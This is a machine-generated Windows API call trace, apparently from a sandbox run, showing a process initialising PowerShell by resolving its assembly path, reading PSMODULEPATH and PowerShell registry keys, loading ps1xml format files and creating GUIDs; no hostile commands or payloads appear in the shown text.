	[0141.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.768] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.769] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0141.770] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0141.770] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0141.771] CoTaskMemFree (pv=0x506ed0) 
	[0141.772] CoTaskMemAlloc (cb=0xcc) returned 0x54d060
	[0141.772] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54d060, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.772] CoTaskMemFree (pv=0x54d060) 
	[0141.772] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d628 | out: phkResult=0x27d628*=0x328) returned 0x0
	[0141.772] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x27d5ac, lpData=0x0, lpcbData=0x27d5a8*=0x0 | out: lpType=0x27d5ac*=0x2, lpData=0x0, lpcbData=0x27d5a8*=0x6c) returned 0x0
	[0141.772] CoTaskMemAlloc (cb=0x70) returned 0x4ef100
	[0141.772] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x27d57c, lpData=0x4ef100, lpcbData=0x27d578*=0x6c | out: lpType=0x27d57c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x27d578*=0x6c) returned 0x0
	[0141.772] CoTaskMemFree (pv=0x4ef100) 
	[0141.772] CoTaskMemAlloc (cb=0xcc) returned 0x54d060
	[0141.772] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x54d060, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0141.772] CoTaskMemFree (pv=0x54d060) 
	[0141.772] CoTaskMemAlloc (cb=0xcc) returned 0x54d060
	[0141.772] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54d060, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.773] CoTaskMemFree (pv=0x54d060) 
	[0141.776] RegCloseKey (hKey=0x328) returned 0x0
	[0141.776] CoTaskMemAlloc (cb=0xcc) returned 0x54d060
	[0141.776] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54d060, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0141.776] CoTaskMemFree (pv=0x54d060) 
	[0141.776] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d628 | out: phkResult=0x27d628*=0x328) returned 0x0
	[0141.776] RegQueryValueExW (in: hKey=0x328, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x27d5ac, lpData=0x0, lpcbData=0x27d5a8*=0x0 | out: lpType=0x27d5ac*=0x0, lpData=0x0, lpcbData=0x27d5a8*=0x0) returned 0x2
	[0141.776] RegCloseKey (hKey=0x328) returned 0x0
	[0145.904] CoTaskMemAlloc (cb=0x20c) returned 0x1b794b60
	[0145.904] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b794b60 | out: pszPath="C:\\Users\\aETAdzjz\\Documents") returned 0x0
	[0146.616] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0146.617] GetFileType (hFile=0x334) returned 0x1
	[0146.617] SetErrorMode (uMode=0x1) returned 0x1
	[0146.617] GetFileType (hFile=0x334) returned 0x1
	[0146.620] ReadFile (in: hFile=0x334, lpBuffer=0x2e42e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d228, lpOverlapped=0x0 | out: lpBuffer=0x2e42e58*, lpNumberOfBytesRead=0x27d228*=0x1000, lpOverlapped=0x0) returned 1
	[0146.623] ReadFile (in: hFile=0x334, lpBuffer=0x2e42e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d228, lpOverlapped=0x0 | out: lpBuffer=0x2e42e58*, lpNumberOfBytesRead=0x27d228*=0x1000, lpOverlapped=0x0) returned 1
	[0146.624] ReadFile (in: hFile=0x334, lpBuffer=0x2e42e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d228, lpOverlapped=0x0 | out: lpBuffer=0x2e42e58*, lpNumberOfBytesRead=0x27d228*=0x1000, lpOverlapped=0x0) returned 1
	[0146.624] ReadFile (in: hFile=0x334, lpBuffer=0x2e42e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d228, lpOverlapped=0x0 | out: lpBuffer=0x2e42e58*, lpNumberOfBytesRead=0x27d228*=0xcf3, lpOverlapped=0x0) returned 1
	[0146.624] ReadFile (in: hFile=0x334, lpBuffer=0x2e422b3, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x27d228, lpOverlapped=0x0 | out: lpBuffer=0x2e422b3*, lpNumberOfBytesRead=0x27d228*=0x0, lpOverlapped=0x0) returned 1
	[0146.624] ReadFile (in: hFile=0x334, lpBuffer=0x2e42e58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27d228, lpOverlapped=0x0 | out: lpBuffer=0x2e42e58*, lpNumberOfBytesRead=0x27d228*=0x0, lpOverlapped=0x0) returned 1
	[0146.627] CloseHandle (hObject=0x334) returned 1
	[0148.293] GetSystemInfo (in: lpSystemInfo=0x27bec0 | out: lpSystemInfo=0x27bec0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0148.294] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0154.456] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.823] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.824] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.825] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.826] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.826] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0156.827] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.392] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.393] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.394] VirtualQuery (in: lpAddress=0x27bf70, lpBuffer=0x27ce30, dwLength=0x30 | out: lpBuffer=0x27ce30*(BaseAddress=0x27b000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.400] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0159.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.400] CoTaskMemFree (pv=0x506ed0) 
	[0159.756] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d428 | out: phkResult=0x27d428*=0x324) returned 0x0
	[0159.757] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x27d43c, lpData=0x0, lpcbData=0x27d438*=0x0 | out: lpType=0x27d43c*=0x1, lpData=0x0, lpcbData=0x27d438*=0x74) returned 0x0
	[0159.757] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x27d3ac, lpData=0x0, lpcbData=0x27d3a8*=0x0 | out: lpType=0x27d3ac*=0x1, lpData=0x0, lpcbData=0x27d3a8*=0x74) returned 0x0
	[0159.757] CoTaskMemAlloc (cb=0x78) returned 0x4ef100
	[0159.757] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x27d37c, lpData=0x4ef100, lpcbData=0x27d378*=0x74 | out: lpType=0x27d37c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x27d378*=0x74) returned 0x0
	[0160.042] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0160.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.042] CoTaskMemFree (pv=0x506ed0) 
	[0160.048] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0160.048] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.048] CoTaskMemFree (pv=0x506ed0) 
	[0160.050] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0160.050] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.050] CoTaskMemFree (pv=0x506ed0) 
	[0160.052] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0160.052] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.052] CoTaskMemFree (pv=0x506ed0) 
	[0160.112] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0160.133] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0160.157] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0160.185] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0160.191] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0160.194] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.201] ReadFile (in: hFile=0x334, lpBuffer=0x33bb0ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bb0ea*, lpNumberOfBytesRead=0x27cf98*=0x0, lpOverlapped=0x0) returned 1
	[0160.203] ReadFile (in: hFile=0x334, lpBuffer=0x33bbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x33bbba0*, lpNumberOfBytesRead=0x27cf98*=0x0, lpOverlapped=0x0) returned 1
	[0160.205] CloseHandle (hObject=0x334) returned 1
	[0160.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.243] SetErrorMode (uMode=0x1) returned 0x1
	[0160.243] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x27cf40 | out: lpFileInformation=0x27cf40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0160.518] SetErrorMode (uMode=0x1) returned 0x1
	[0160.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.518] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d028 | out: phkResult=0x27d028*=0x334) returned 0x0
	[0160.518] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cfac, lpData=0x0, lpcbData=0x27cfa8*=0x0 | out: lpType=0x27cfac*=0x1, lpData=0x0, lpcbData=0x27cfa8*=0x56) returned 0x0
	[0160.518] CoTaskMemAlloc (cb=0x5a) returned 0x555f20
	[0160.518] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x27cf7c, lpData=0x555f20, lpcbData=0x27cf78*=0x56 | out: lpType=0x27cf7c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x27cf78*=0x56) returned 0x0
	[0160.518] CoTaskMemFree (pv=0x555f20) 
	[0160.518] RegCloseKey (hKey=0x334) returned 0x0
	[0160.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cc70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.519] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cb20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0160.526] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x18c0648, Data2=0xcdea, Data3=0x43c6, Data4=([0]=0xa3, [1]=0x64, [2]=0x34, [3]=0xb0, [4]=0x1f, [5]=0x90, [6]=0x2f, [7]=0x5f))) returned 0x0
	[0160.542] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0xc7fff852, Data2=0xa49c, Data3=0x48dc, Data4=([0]=0x93, [1]=0x23, [2]=0x87, [3]=0x38, [4]=0x6a, [5]=0x6b, [6]=0x6d, [7]=0x58))) returned 0x0
	[0167.830] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x6db42302, Data2=0xff34, Data3=0x4042, Data4=([0]=0x84, [1]=0x82, [2]=0x55, [3]=0x41, [4]=0x38, [5]=0x9b, [6]=0x1a, [7]=0xf5))) returned 0x0
	[0167.836] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x73f9c447, Data2=0x20e8, Data3=0x4350, Data4=([0]=0xba, [1]=0x48, [2]=0x32, [3]=0x8e, [4]=0xf5, [5]=0x7f, [6]=0x67, [7]=0x6))) returned 0x0
	[0167.838] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x6ab86f1, Data2=0xab83, Data3=0x455b, Data4=([0]=0x8f, [1]=0x97, [2]=0x5a, [3]=0x3d, [4]=0xf6, [5]=0x9e, [6]=0xc5, [7]=0xa6))) returned 0x0
	[0167.838] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x4c0ec6ac, Data2=0x7d44, Data3=0x46f2, Data4=([0]=0x96, [1]=0xf3, [2]=0x1, [3]=0xb2, [4]=0xf7, [5]=0xd4, [6]=0xcc, [7]=0x42))) returned 0x0
	[0167.839] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x135e9935, Data2=0xd6d, Data3=0x41ff, Data4=([0]=0x93, [1]=0x98, [2]=0x2f, [3]=0x53, [4]=0x73, [5]=0xf5, [6]=0x95, [7]=0xe8))) returned 0x0
	[0167.840] CoCreateGuid (in: pguid=0x27d250 | out: pguid=0x27d250*(Data1=0x7d084e24, Data2=0xd628, Data3=0x4946, Data4=([0]=0x85, [1]=0x64, [2]=0x9, [3]=0x73, [4]=0x61, [5]=0x7f, [6]=0x4a, [7]=0xfc))) returned 0x0
	[0167.840] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27ca10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.840] SetErrorMode (uMode=0x1) returned 0x1
	[0167.840] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0167.841] GetFileType (hFile=0x334) returned 0x1
	[0167.841] SetErrorMode (uMode=0x1) returned 0x1
	[0167.841] GetFileType (hFile=0x334) returned 0x1
	[0167.841] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0167.842] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0167.842] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0167.842] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0167.844] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0167.844] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x1000, lpOverlapped=0x0) returned 1
	[0167.844] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0xaca, lpOverlapped=0x0) returned 1
	[0167.844] ReadFile (in: hFile=0x334, lpBuffer=0x3431a9a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3431a9a*, lpNumberOfBytesRead=0x27cf98*=0x0, lpOverlapped=0x0) returned 1
	[0167.844] ReadFile (in: hFile=0x334, lpBuffer=0x3432468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x27cf98, lpOverlapped=0x0 | out: lpBuffer=0x3432468*, lpNumberOfBytesRead=0x27cf98*=0x0, lpOverlapped=0x0) returned 1
	[0167.844] CloseHandle (hObject=0x334) returned 1
	[0167.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x27cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0167.844] SetErrorMode (uMode=0x1) returned 0x1
